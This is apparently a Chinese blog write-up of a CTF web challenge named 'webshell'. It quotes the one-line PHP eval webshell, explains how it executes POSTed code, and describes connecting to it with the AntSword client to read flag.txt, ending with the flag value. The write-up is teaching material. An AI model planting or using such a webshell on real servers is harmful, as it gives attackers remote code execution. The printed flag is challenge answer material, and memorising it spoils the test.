攻防世界 web webshell

做题两分钟,工具两小时

题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

所谓的php一句话:<?php @eval($_POST['shell']);?>
这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算

这题又涉及到新的web工具,Cknife (因为现在网络上菜刀的后门太多了,所以不推荐菜刀了)
这次我用的是antsword,antsword的github链接
这题时间主要花在了解题工具上面,做题倒是很快。

1.右键添加数据
攻防世界 web webshell
2.把url和连接密码输进去
因为这题提示是webshell,所以推测密码是shell,一开始我把那个一句话php放进去发现不对…
攻防世界 web webshell
3.找到flag.txt
攻防世界 web webshell
cyberpeace{17b8c20c87ed744736dca537ddea2777}

攻防世界 web webshell攻防世界 web webshell Wo_Knight 发布了59 篇原创文章 · 获赞 4 · 访问量 1755 私信 关注
上一篇:CTF--HTTP服务--路径遍历(拿到www-data用户权限)


下一篇:第4阶段 实战web渗透测试视频课程(第一部分) 27、漏洞平台获取奖金简单讲解 2、实战演示mssql数据库注入-SA权限拿webshell